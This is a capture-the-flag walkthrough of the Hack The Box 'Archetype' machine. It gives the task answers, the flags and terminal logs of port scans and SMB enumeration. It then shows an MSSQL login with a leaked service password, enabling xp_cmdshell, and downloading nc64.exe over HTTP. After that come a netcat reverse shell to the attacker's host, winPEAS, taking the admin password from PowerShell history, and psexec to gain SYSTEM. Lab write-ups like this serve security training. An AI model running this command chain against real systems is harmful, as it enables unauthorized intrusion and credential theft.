CONNECT
Connect to Starting Point VPN before starting the machine
Spawn Machine
Click to Spawn the machine
Task 1
Which TCP port is hosting a database server?
***3
1433
Hide Answer
Task 2
What is the name of the non-Administrative share available over SMB?
******s
backups
Hide Answer
Task 3
What is the password identified in the file on the SMB share?
**********3
M3g4c0rp123
Hide Answer
Task 4
What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
***********.*y
mssqlclient.py
Hide Answer
Task 5
What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
**_*******l
xp_cmdshell
Hide Answer
Task 6
What script can be used in order to search possible paths to escalate privileges on Windows hosts?
******s
winPEAS
Hide Answer
Task 7
What file contains the administrator’s password?
***********_*******.**t
ConsoleHost_history.txt
Hide Answer
Submit Flag
Submit user flag
3e7b102e78218e935bf3f4951fec21a3
Hide Answer
Submit Flag
Submit root flag
b91ccec3305e98240082d4474b848528
Hide Answer
┌──(kwkl㉿kwkl)-[~]
└─$ sudo masscan -e tun0 -p- --max-rate 500 10.129.204.93
[sudo] kwkl 的密码:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-11-16 07:01:41 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 49668/tcp on 10.129.204.93
Discovered open port 49664/tcp on 10.129.204.93
Discovered open port 49667/tcp on 10.129.204.93
Discovered open port 49665/tcp on 10.129.204.93
Discovered open port 47001/tcp on 10.129.204.93
Discovered open port 49669/tcp on 10.129.204.93
Discovered open port 135/tcp on 10.129.204.93
Discovered open port 445/tcp on 10.129.204.93
Discovered open port 5985/tcp on 10.129.204.93
Discovered open port 139/tcp on 10.129.204.93
Discovered open port 1433/tcp on 10.129.204.93
Discovered open port 49666/tcp on 10.129.204.93
┌──(kwkl㉿kwkl)-[~]
└─$ sudo nmap -A -v -sS -sV -p135,445,1433 10.129.204.93
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-16 15:13 HKT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:13
Completed NSE at 15:13, 0.00s elapsed
Initiating NSE at 15:13
Completed NSE at 15:13, 0.00s elapsed
Initiating NSE at 15:13
Completed NSE at 15:13, 0.00s elapsed
Initiating Ping Scan at 15:13
Scanning 10.129.204.93 [4 ports]
Completed Ping Scan at 15:14, 0.70s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:14
Completed Parallel DNS resolution of 1 host. at 15:14, 0.14s elapsed
Initiating SYN Stealth Scan at 15:14
Scanning 10.129.204.93 [3 ports]
Discovered open port 445/tcp on 10.129.204.93
Discovered open port 135/tcp on 10.129.204.93
Discovered open port 1433/tcp on 10.129.204.93
Completed SYN Stealth Scan at 15:14, 0.59s elapsed (3 total ports)
Initiating Service scan at 15:14
Scanning 3 services on 10.129.204.93
Completed Service scan at 15:14, 9.81s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.129.204.93
Retrying OS detection (try #2) against 10.129.204.93
Initiating Traceroute at 15:14
Completed Traceroute at 15:14, 0.68s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:14
Completed Parallel DNS resolution of 2 hosts. at 15:14, 0.02s elapsed
NSE: Script scanning 10.129.204.93.
Initiating NSE at 15:14
Completed NSE at 15:14, 24.29s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 2.61s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Nmap scan report for 10.129.204.93
Host is up (0.60s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-16T07:00:36
| Not valid after: 2052-11-16T07:00:36
| MD5: dbaa bc37 60b9 7680 2e0b 051a 0f72 77aa
|_SHA-1: 26eb 5770 0605 60e3 7dd0 5de3 0a89 fd3b 68b2 922e
|_ssl-date: 2022-11-16T07:14:42+00:00; -1s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Vista SP1 (92%), Microsoft Windows 10 1709 - 1909 (91%), Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2008 SP2 (90%), Microsoft Windows Server 2012 R2 Update 1 (90%), Microsoft Windows Longhorn (90%), Microsoft Windows Server 2016 (89%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows 10 1709 - 1803 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h35m59s, deviation: 3h34m41s, median: -1s
| ms-sql-info:
| 10.129.204.93:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-11-15T23:14:19-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-11-16T07:14:21
|_ start_date: N/A
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 669.37 ms 10.10.16.1
2 363.52 ms 10.129.204.93
NSE: Script Post-scanning.
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.89 seconds
Raw packets sent: 49 (3.560KB) | Rcvd: 44 (3.068KB)
┌──(kwkl㉿kwkl)-[~]
└─$ sudo nmap -A -v -sS -sV -p445 10.129.204.93 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-16 15:17 HKT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:17
Completed NSE at 15:17, 0.00s elapsed
Initiating NSE at 15:17
Completed NSE at 15:17, 0.00s elapsed
Initiating NSE at 15:17
Completed NSE at 15:17, 0.00s elapsed
Initiating Ping Scan at 15:17
Scanning 10.129.204.93 [4 ports]
Completed Ping Scan at 15:17, 0.34s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:17
Completed Parallel DNS resolution of 1 host. at 15:17, 0.01s elapsed
Initiating SYN Stealth Scan at 15:17
Scanning 10.129.204.93 [1 port]
Discovered open port 445/tcp on 10.129.204.93
Completed SYN Stealth Scan at 15:17, 0.76s elapsed (1 total ports)
Initiating Service scan at 15:17
Scanning 1 service on 10.129.204.93
Completed Service scan at 15:18, 6.80s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.129.204.93
Retrying OS detection (try #2) against 10.129.204.93
Initiating Traceroute at 15:18
Completed Traceroute at 15:18, 0.53s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:18
Completed Parallel DNS resolution of 2 hosts. at 15:18, 0.01s elapsed
NSE: Script scanning 10.129.204.93.
Initiating NSE at 15:18
Completed NSE at 15:18, 23.58s elapsed
Initiating NSE at 15:18
Completed NSE at 15:18, 0.00s elapsed
Initiating NSE at 15:18
Completed NSE at 15:18, 0.00s elapsed
Nmap scan report for 10.129.204.93
Host is up (0.59s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows Server 2012 R2 (90%), Microsoft Windows 10 1709 - 1909 (90%), Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2008 SP2 (89%), Microsoft Windows Vista SP1 (89%), Microsoft Windows XP SP3 (89%), Microsoft Windows 10 1709 - 1803 (88%), Microsoft Windows 10 1809 - 1909 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: Randomized
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h40m01s, deviation: 4h37m09s, median: 0s
| ms-sql-info:
| 10.129.204.93:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-11-15T23:18:13-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-11-16T07:18:11
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 519.04 ms 10.10.16.1
2 279.88 ms 10.129.204.93
NSE: Script Post-scanning.
Initiating NSE at 15:18
Completed NSE at 15:18, 0.00s elapsed
Initiating NSE at 15:18
Completed NSE at 15:18, 0.00s elapsed
Initiating NSE at 15:18
Completed NSE at 15:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.07 seconds
Raw packets sent: 47 (3.472KB) | Rcvd: 41 (2.944KB)
┌──(kwkl㉿kwkl)-[~]
└─$ smbclient -L //10.129.204.93/ -U backups 1 ⨯
Password for [WORKGROUP\backups]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
┌──(kwkl㉿kwkl)-[~]
└─$ smbclient //10.129.204.93/backups
Password for [WORKGROUP\kwkl]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 20 20:20:57 2020
.. D 0 Mon Jan 20 20:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 20:23:02 2020
5056511 blocks of size 4096. 2558425 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit
┌──(kwkl㉿kwkl)-[~]
└─$ cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
┌──(kwkl㉿kwkl)-[~/HODL/htb]
└─$ git clone https://github.com/SecureAuthCorp/impacket
正克隆到 'impacket'...
remote: Enumerating objects: 21981, done.
remote: Counting objects: 100% (129/129), done.
remote: Compressing objects: 100% (77/77), done.
remote: Total 21981 (delta 73), reused 87 (delta 52), pack-reused 21852
接收对象中: 100% (21981/21981), 7.78 MiB | 279.00 KiB/s, 完成.
处理 delta 中: 100% (16779/16779), 完成.
┌──(kwkl㉿kwkl)-[~/下载]
└─$ python3 -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
127.0.0.1 - - [16/Nov/2022 15:50:36] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [16/Nov/2022 15:50:36] code 404, message File not found
127.0.0.1 - - [16/Nov/2022 15:50:36] "GET /favicon.ico HTTP/1.1" 404 -
127.0.0.1 - - [16/Nov/2022 15:52:04] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [16/Nov/2022 15:52:14] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [16/Nov/2022 15:54:47] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [16/Nov/2022 15:57:05] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [16/Nov/2022 15:57:06] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [16/Nov/2022 15:57:06] "GET / HTTP/1.1" 200 -
10.10.16.44 - - [16/Nov/2022 15:57:29] "GET / HTTP/1.1" 200 -
10.10.16.44 - - [16/Nov/2022 15:57:29] code 404, message File not found
10.10.16.44 - - [16/Nov/2022 15:57:29] "GET /favicon.ico HTTP/1.1" 404 -
10.129.204.93 - - [16/Nov/2022 16:02:00] "GET /nc64.exe HTTP/1.1" 200 -
10.129.204.93 - - [16/Nov/2022 16:13:15] "GET /winPEASx64.exe HTTP/1.1" 200 -
10.129.204.93 - - [16/Nov/2022 16:16:15] "GET /winPEASx64.exe HTTP/1.1" 200 -
┌──(kwkl㉿kwkl)-[~/HODL/htb/impacket/examples]
└─$ python3 mssqlclient.py -h
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug] [-file FILE] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target
TDS client implementation (SSL supported).
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
options:
-h, --help show this help message and exit
-port PORT target MSSQL port (default 1433)
-db DB MSSQL database instance (default None)
-windows-auth whether or not to use Windows Authentication (default False)
-debug Turn DEBUG output ON
-file FILE input file with commands to execute in the SQL shell
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will
use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-dc-ip ip address IP Address of the
┌──(kwkl㉿kwkl)-[~/HODL/htb/impacket/examples]
└─$ python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.204.93 -windows-auth
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> SELECT is_srvrolemember('sysadmin');
-----------
1
SQL> EXEC xp_cmdshell 'net user';
SQL> EXEC sp_configure 'show advanced options', 1;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> sp_configure; - Enabling the sp_configure as stated in the above error message
[-] ERROR(ARCHETYPE): Line 1: Incorrect syntax near '-'.
SQL> EXEC sp_configure 'xp_cmdshell', 1;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> EXEC sp_configure 'show advanced options', 1;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure
SQL> ;
SQL> reconfigure;
SQL> SELECT is_srvrolemember('sysadmin');
-----------
1
SQL> EXEC xp_cmdshell 'net user';
output
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
NULL
User accounts for \\ARCHETYPE
NULL
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
sql_svc WDAGUtilityAccount
The command completed successfully.
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.44:4444/nc64.exe -outfile nc64.exe"
output
--------------------------------------------------------------------------------
NULL
┌──(kwkl㉿kwkl)-[~/HODL]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
SQL> xp_cmdshell " powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.16.44 443"
┌──(kwkl㉿kwkl)-[~/HODL]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.44] from (UNKNOWN) [10.129.204.93] 49678
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\sql_svc\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\Downloads
11/16/2022 01:02 AM .
11/16/2022 01:02 AM ..
11/16/2022 01:02 AM 45,272 nc64.exe
1 File(s) 45,272 bytes
2 Dir(s) 10,712,485,888 bytes free
C:\Users\sql_svc\Downloads>powershell wget http://10.10.16.44:4444/winPEASx64.exe -outfile winPEASx64.exe
powershell wget http://10.10.16.44:4444/winPEASx64.exe -outfile winPEASx64.exe
C:\Users\sql_svc\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\Downloads
11/16/2022 01:16 AM .
11/16/2022 01:16 AM ..
11/16/2022 01:02 AM 45,272 nc64.exe
11/16/2022 01:16 AM 1,930,752 winPEASx64.exe
2 File(s) 1,976,024 bytes
2 Dir(s) 10,710,552,576 bytes free
C:\Users\sql_svc\Downloads>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\sql_svc\Downloads> .\winPEASx64.exe
.\winPEASx64.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run ' REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
*((,.,/((((((((((((((((((((/, */
,/*,..*((((((((((((((((((((((((((((((((((,
,*/((((((((((((((((((/, .*//((//**, .*(((((((*
((((((((((((((((**********/########## .(* ,(((((((
(((((((((((/********************/####### .(. (((((((
((((((..******************/@@@@@/***/###### ./(((((((
,,....********************@@@@@@@@@@(***,#### .//((((((
, ,..********************/@@@@@%@@@@/********##((/ /((((
..((###########*********/%@@@@@@@@@/************,,..((((
.(##################(/******/@@@@@/***************.. /((
.(#########################(/**********************..*((
.(##############################(/*****************.,(((
.(###################################(/************..(((
.(#######################################(*********..(((
.(#######(,.***.,(###################(..***.*******..(((
.(#######*(#####((##################((######/(*****..(((
.(###################(/***********(##############(...(((
.((#####################/*******(################.((((((
.(((############################################(..((((
..(((##########################################(..(((((
....((########################################( .(((((
......((####################################( .((((((
(((((((((#################################(../((((((
(((((((((/##########################(/..((((((
(((((((((/,. ,*//*,. ./(((((((((((((((.
(((((((((((((((((((((((((((((/
ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
WinPEASng by @carlospolopm, makikvues(makikvues2[at]gmail[dot]com)
/---------------------------------------------------------------------------\
���������� Analyzing Other Windows Files Files (limit 70)
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli & makikvues |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
PS C:\Users\sql_svc\Downloads>
PS C:\Users\sql_svc\Downloads> dir
dir
Directory: C:\Users\sql_svc\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/16/2022 1:02 AM 45272 nc64.exe
-a---- 11/16/2022 1:16 AM 1930752 winPEASx64.exe
PS C:\Users\sql_svc\Downloads> type ../Desktop/user.txt
type ../Desktop/user.txt
3e7b102e78218e935bf3f4951fec21a3
PS C:\Users\sql_svc\Downloads> cd AppData
cd AppData
cd : Cannot find path 'C:\Users\sql_svc\Downloads\AppData' because it does not exist.
At line:1 char:1
+ cd AppData
+ ~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\sql_svc\Downloads\AppData:String) [Set-Location], ItemNotFound
Exception
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand
PS C:\Users\sql_svc\Downloads> cd appdata
cd appdata
cd : Cannot find path 'C:\Users\sql_svc\Downloads\appdata' because it does not exist.
At line:1 char:1
+ cd appdata
+ ~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\sql_svc\Downloads\appdata:String) [Set-Location], ItemNotFound
Exception
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand
PS C:\Users\sql_svc\Downloads> cd ../appdata
cd ../appdata
PS C:\Users\sql_svc\appdata> cd Roaming\Microsoft\Windows\PowerShell\PSReadline
cd Roaming\Microsoft\Windows\PowerShell\PSReadline
PS C:\Users\sql_svc\appdata\Roaming\Microsoft\Windows\PowerShell\PSReadline> dir
dir
Directory: C:\Users\sql_svc\appdata\Roaming\Microsoft\Windows\PowerShell\PSReadline
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/17/2020 2:36 AM 79 ConsoleHost_history.txt
PS C:\Users\sql_svc\appdata\Roaming\Microsoft\Windows\PowerShell\PSReadline> type ConsoleHost_history.txt
type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
PS C:\Users\sql_svc\appdata\Roaming\Microsoft\Windows\PowerShell\PSReadline>
┌──(kwkl㉿kwkl)-[~/HODL/htb/impacket/examples]
└─$ psexec.py administrator@10.129.204.93 130 ⨯ 1 ⚙
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
Password:
[*] Requesting shares on 10.129.204.93.....
[*] Found writable share ADMIN$
[*] Uploading file HFExoGmF.exe
[*] Opening SVCManager on 10.129.204.93.....
[*] Creating service DPtQ on 10.129.204.93.....
[*] Starting service DPtQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd ..
C:\Windows> cd ..
C:\> dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\
01/20/2020 04:20 AM <DIR> backups
07/27/2021 01:28 AM <DIR> PerfLogs
07/27/2021 02:20 AM <DIR> Program Files
07/27/2021 02:20 AM <DIR> Program Files (x86)
01/19/2020 10:39 PM <DIR> Users
11/16/2022 01:26 AM <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 10,710,130,688 bytes free
C:\> cd users
C:\Users> dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users
01/19/2020 03:10 PM <DIR> .
01/19/2020 03:10 PM <DIR> ..
01/19/2020 10:39 PM <DIR> Administrator
01/19/2020 10:39 PM <DIR> Public
01/20/2020 05:01 AM <DIR> sql_svc
0 File(s) 0 bytes
5 Dir(s) 10,710,130,688 bytes free
C:\Users> cd Administrator
C:\Users\Administrator> dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\Administrator
01/19/2020 10:39 PM <DIR> .
01/19/2020 10:39 PM <DIR> ..
07/27/2021 01:30 AM <DIR> 3D Objects
07/27/2021 01:30 AM <DIR> Contacts
07/27/2021 01:30 AM <DIR> Desktop
07/27/2021 01:30 AM <DIR> Documents
07/27/2021 01:30 AM <DIR> Downloads
07/27/2021 01:30 AM <DIR> Favorites
07/27/2021 01:30 AM <DIR> Links
07/27/2021 01:30 AM <DIR> Music
07/27/2021 01:30 AM <DIR> Pictures
07/27/2021 01:30 AM <DIR> Saved Games
07/27/2021 01:30 AM <DIR> Searches
07/27/2021 01:30 AM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 10,710,130,688 bytes free
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\Administrator\Desktop
07/27/2021 01:30 AM <DIR> .
07/27/2021 01:30 AM <DIR> ..
02/25/2020 06:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 10,710,130,688 bytes free
C:\Users\Administrator\Desktop> type root.txt
b91ccec3305e98240082d4474b848528
C:\Users\Administrator\Desktop>